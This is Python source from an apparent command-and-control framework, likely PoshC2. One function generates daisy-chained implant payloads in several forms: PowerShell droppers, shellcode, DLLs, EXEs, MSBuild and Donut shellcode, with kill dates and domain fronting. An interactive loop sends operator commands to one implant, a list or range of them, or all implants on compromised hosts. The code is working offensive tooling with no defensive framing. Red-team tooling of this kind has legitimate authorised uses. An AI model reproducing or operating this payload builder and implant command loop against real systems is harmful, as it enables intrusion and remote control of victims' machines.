def do_createdaisypayload(user, command): name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ") default_url = get_first_url(PayloadCommsHost, DomainFrontHeader) daisyurl = input(f"Daisy URL: e.g. {default_url} ") if ("http://127.0.0.1" in daisyurl): daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost") if ("https://127.0.0.1" in daisyurl): daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost") daisyhostid = input("Select Daisy Implant Host: e.g. 5 ") daisyhost = get_implantbyid(daisyhostid) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" pbindsecret = PBindSecret pbindpipename = PBindPipeName daisyurl, daisyurl_count = string_to_array(daisyurl) daisyhostheader = "" c = 0 daisyurls = daisyurl.split(",") for url in daisyurls: if c > 0: daisyhostheader += ",\"\"" else: daisyhostheader += "\"\"" c += 1 C2 = get_c2server_all() urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "") newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret) newPayload.PSDropper = (newPayload.PSDropper).replace( "$pid;%s" % (daisyurl), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain)) newPayload.CreateDroppers("%s_" % name) newPayload.CreateShellcode("%s_" % name) newPayload.CreateRaw("%s_" % name) newPayload.CreateDlls("%s_" % name) newPayload.CreateEXE("%s_" % name) newPayload.CreateMsbuild("%s_" % name) newPayload.CreateDonutShellcode("%s_" % name) newPayload.BuildDynamicPayloads("%s_" % name) print_good("Created new %s daisy payloads" % name) input("Press Enter to continue...") clear()
def get_implant_type_prompt_prefix(implant_id): if "," in str(implant_id): return "" implant = get_implantbyid(implant_id) pivot = implant.Pivot pivot_original = pivot if pivot_original.startswith("PS"): pivot = "PS" elif pivot_original.startswith("C#"): pivot = "C#" elif pivot_original.startswith("Python"): pivot = "PY" if "Daisy" in pivot_original: pivot = pivot + ";D" if "Proxy" in pivot_original: pivot = pivot + ";P" if "PBind" in pivot_original: pivot = pivot + ";PB" return pivot
def implant_command_loop(implant_id, user): while (True): try: style = Style.from_dict({ '': '#80d130', }) session = PromptSession(history=FileHistory('%s/.implant-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) implant_id_orig = implant_id if ("-" in implant_id) or ("all" in implant_id) or ("," in implant_id): print(Colours.GREEN) prompt_commands = POSH_COMMANDS command = session.prompt("%s> " % implant_id, completer=FirstWordFuzzyWordCompleter( prompt_commands, WORD=True)) if command == "back" or command == 'clear': do_back(user, command) return else: implant = get_implantbyid(implant_id) if not implant: print_bad("Unrecognised implant id or command: %s" % implant_id) input("Press Enter to continue...") clear() return prompt_commands = POSH_COMMANDS if implant.Pivot.startswith('Python'): prompt_commands = PY_COMMANDS if implant.Pivot.startswith('C#'): prompt_commands = SHARP_COMMANDS if 'PB' in implant.Pivot: style = Style.from_dict({ '': '#008ECC', }) session = PromptSession( history=FileHistory('%s/.implant-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) prompt_commands = SHARP_COMMANDS print(Colours.BLUE) else: print(Colours.GREEN) print("%s\\%s @ %s (PID:%s)" % (implant.Domain, implant.User, implant.Hostname, implant.PID)) command = session.prompt( "%s %s> " % (get_implant_type_prompt_prefix(implant_id), implant_id), completer=FirstWordFuzzyWordCompleter(prompt_commands, WORD=True)) if command == "back" or command == 'clear': do_back(user, command) return # if "all" run through all implants get_implants() if implant_id == "all": if command == "back" or command == 'clear': do_back(user, command) return allcommands = command if "\n" in command: ri = input( "Do you want to run commands separately? (Y/n) ") implants_split = get_implants() if implants_split: for implant_details in implants_split: # if "\n" in command run each command individually or ask the question if that's what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: run_implant_command( command, implant_details.RandomURI, implant_id_orig, user) else: run_implant_command(command, implant_details.RandomURI, implant_id_orig, user) else: run_implant_command(command, implant_details.RandomURI, implant_id_orig, user) # if "separated list" against single uri elif "," in implant_id: allcommands = command if "\n" in command: ri = input( "Do you want to run commands separately? (Y/n) ") implant_split = implant_id.split(",") for split_implant_id in implant_split: implant_randomuri = get_randomuri(split_implant_id) # if "\n" in command run each command individually or ask the question if that's what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: run_implant_command(command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) # if "range" against single uri elif "-" in implant_id: allcommands = command if "\n" in command: ri = input( "Do you want to run commands separately? (Y/n) ") implant_split = implant_id.split("-") for range_implant_id in range(int(implant_split[0]), int(implant_split[1]) + 1): try: implant_randomuri = get_randomuri(range_implant_id) # if "\n" in command run each command individually or ask the question if that's what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: run_implant_command( command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) except Exception: print_bad("Unknown ImplantID") # else run against single uri else: allcommands = command if "\n" in command: ri = input( "Do you want to run commands separately? (Y/n) ") implant_randomuri = get_randomuri(implant_id) # if "\n" in command run each command individually or ask the question if that's what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: run_implant_command(command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) else: run_implant_command(command, implant_randomuri, implant_id_orig, user) except KeyboardInterrupt: continue except EOFError: new_c2_message("%s logged off." % user) sys.exit(0) except Exception as e: traceback.print_exc() print_bad( f"Error running against the selected implant ID, ensure you have typed the correct information: {e}" ) return